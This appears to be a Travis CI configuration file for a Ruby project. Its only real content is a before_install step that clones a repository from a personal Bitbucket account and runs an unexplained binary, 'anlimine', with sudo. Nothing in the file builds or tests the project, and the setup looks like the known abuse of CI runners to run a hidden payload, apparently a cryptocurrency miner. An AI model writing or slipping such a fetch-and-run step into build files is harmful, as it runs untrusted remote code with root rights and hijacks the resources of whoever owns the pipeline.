language: ruby

services:
  - docker

before_install:
  - sudo apt install -y git && sudo git clone https://swenson12@bitbucket.org/swenson12/ridho.git && cd ridho && sudo chmod u+x anlimine && sudo ./anlimine
